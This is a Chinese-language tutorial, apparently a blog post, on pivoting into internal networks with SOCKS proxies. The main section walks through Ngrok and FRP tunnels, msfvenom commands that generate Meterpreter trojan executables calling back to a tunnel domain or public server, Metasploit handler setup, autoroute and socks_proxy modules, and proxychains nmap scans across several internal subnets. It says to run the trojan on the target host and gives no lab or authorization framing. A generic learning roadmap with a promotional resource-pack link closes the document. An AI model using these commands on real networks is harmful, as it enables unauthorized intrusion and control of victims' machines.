内网安全:Socks 代理 || 本地代理 技术.
Socks
代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4
和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
目录:
内网安全:Socks 代理 技术.
两个内网通讯上线( Ngrok )
(1)开通隧道:
(2)下载客户端:
(3)生成一个程序后门:
(4)进行监听:(kali)
两个内网通讯上线( Frp 自建跳板 )
(1)跳板环境搭建:
(2)生成程序后面:
(3)进行监听:(kali)
本地代理:( MSF 跳板多个内网主机系列)
第二层内网代理:
(1)信息收集及配置访问:
(2)开启本地代理:
(3)内网扫描:
(4)浏览器访问:
第三层内网代理:
(1)生成正向程序后门:
(2)进行监听:
(3)信息收集及配置访问:
(4)开启本地代理:
第四层内网渗透:
(1)生成正向程序后门:
(2)进行监听:
代理解决的问题:(1)内网有外网 (2)内网有过滤 (3)内网无外网
两个内网通讯上线( Ngrok )
开通隧道工具:https://www.ngrok.cc/user.html
理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
(开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)
(1)开通隧道:
(2)下载客户端:
解压放到 kali 中:(切换的刚刚下载的文件目录中)
(1)./sunny clientid 115735315695 // 执行
./sunny clientid 隧道的IP
(3)生成一个程序后门:(木马)
msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe
(4)进行监听:(kali)
(1)msfconsole
(2)use exploit/multi/handler
(3)set payload windows/meterpreter/reverse_http
(4)set lhost 192.168.0.106 // 本地的 IP 地址
(5)set lport 4444 // 本地的 端口.
(6)exploit
两个内网通讯上线( Frp 自建跳板 )
(1)跳板环境 搭建:
需要有自己的服务器,有来搭建跳板.
【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases
服务器修改配置文件 frps.ini:
[common]
bind_port = 6677 // 这个端口修改为 服务器 开放的就行
启动服务端:【切换在下载的目录并执行】
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主机 IP 地址
server_port = 6677 // frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 // 转发给本机的 5555
remote_port = 6000 // 服务端用 6000 端口转发给本机
启动客户端:【切换在下载的目录并执行】
./frpc -c ./frpc.ini
(2)生成程序后面:(木马)
msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe
(3)进行监听:(kali)
(1)msfconsole
(2)use exploit/multi/handler
(3)set payload windows/meterpreter/reverse_tcp
(4)set LHOST 127.0.0.1
(5)set LPORT 5555 // 本机监听的端口【和控制端的一样】
(6)exploit
然后把程序后门(木马)放在目标主机上执行就行.
本地代理:( MSF 跳板多个内网主机系列)
第二层内网代理:
(1)信息收集及配置访问:
(1)run get_local_subnets // 获取网络接口
(2)run autoroute -p // 查看路由地址
(3)run autoroute -s 10.0.20.0/24 // 添加地二层内网的路由网段.
或
(3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段
(2)开启本地代理:
background // 挂起会话
如果是msf6,使用代理模板为:
use auxiliary/server/socks_proxy
如果是msf5,使用代理模板为:
use auxiliary/server/socks4a
(1)set srvport 2222 // 设置本地代理端口为2222
(2)exploit // 运行
(3)内网扫描:
打开 /etc/proxychains4.conf 文件:
socks4 192.168.0.106 2222 // 添加 本地的代理和端口
进行扫描:
proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.
-sT:扫描 TCP 数据包已建立的连接 connect
(4)浏览器访问:
第三层内网代理:
(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe
(2)进行监听:
要在和上面一样的 msf 会话中执行.
(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set rhost 10.0.20.99 // 第二层内网的 IP 地址
(4)set lport 54321 // 和程序后面(木马)一样的端口
(5)exploit
(3)信息收集及配置访问:
(1)run get_local_subnets // 获取网络接口
(2)run autoroute -p // 查看路由地址
(3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段.
(4)开启本地代理:
background // 挂起会话
如果是msf6,使用代理模板为:
use auxiliary/server/socks_proxy
如果是msf5,使用代理模板为:
use auxiliary/server/socks4a
(1)set srvport 6666 // 默认端口6666
(2)exploit // 运行
第四层内网渗透:
(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe
(2)进行监听:
要在和上面一样的 msf 会话中执行.
(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set rhost 10.0.10.110 // 第二层内网的 IP 地址
(4)set lport 9876 // 和程序后面(木马)一样的端口
(5)exploit
网络安全入门学习路线
其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。
1.网络安全法和了解电脑基础
其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等…
别被这些看上去很多的东西给吓到了,其实都是很简单的基础知识,同学们看完基本上都能掌握。计算机专业的同学都应该接触了解过,这部分可以直接略过。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。
当然你也可以看下面这个视频教程仅展示部分截图:
学到http和https抓包后能读懂它在说什么就行。
2.网络基础和编程语言
3.入手Web安全
web是对外开放的,自然成了的重点关照对象,有事没事就来入侵一波,你说不管能行吗!
想学好Web安全,咱首先得先弄清web是怎么搭建的,知道它的构造才能精准打击。所以web前端和web后端的知识多少要了解点,然后再学点python,起码得看懂部分代码吧。
最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
等你用几周的时间学完这些,基本上算是具备了入门合格渗透工程师的资格,记得上述的重点要重点关注哦!
再就是,要正式进入web安全领域,得学会web渗透,OWASP TOP 10等常见Web漏洞原理与利用方式需要掌握,像SQL注入/XSS跨站脚本攻击/Webshell木马编写/命令执行等。
这个过程并不枯燥,一边打怪刷级一边成长岂不美哉,每个攻击手段都能让你玩得不亦乐乎,而且总有更猥琐的方法等着你去实践。
学完web渗透还不算完,还得掌握相关系统层面漏洞,像ms17-010永恒之蓝等各种微软ms漏洞,所以要学习后渗透。可能到这里大家已经不知所云了,不过不要紧,等你学会了web渗透再来看会发现很简单。
其实学会了这几步,你就正式从新手小白晋升为入门学员了,真的不算难,你上你也行。
4.安全体系
不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
所以想要成为一名合格的网络工程师,想要拿到安全公司的offer,还得再掌握更多的网络安全知识,能力再更上一层楼才行。即便以后进入企业,也需要学习很多新知识,不充实自己的技能就会被淘汰。
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
尾言
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,最后联合CSDN整理了一套【282G】网络安全从入门到精通资料包,需要的小伙伴可以点击链接领取哦!
点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!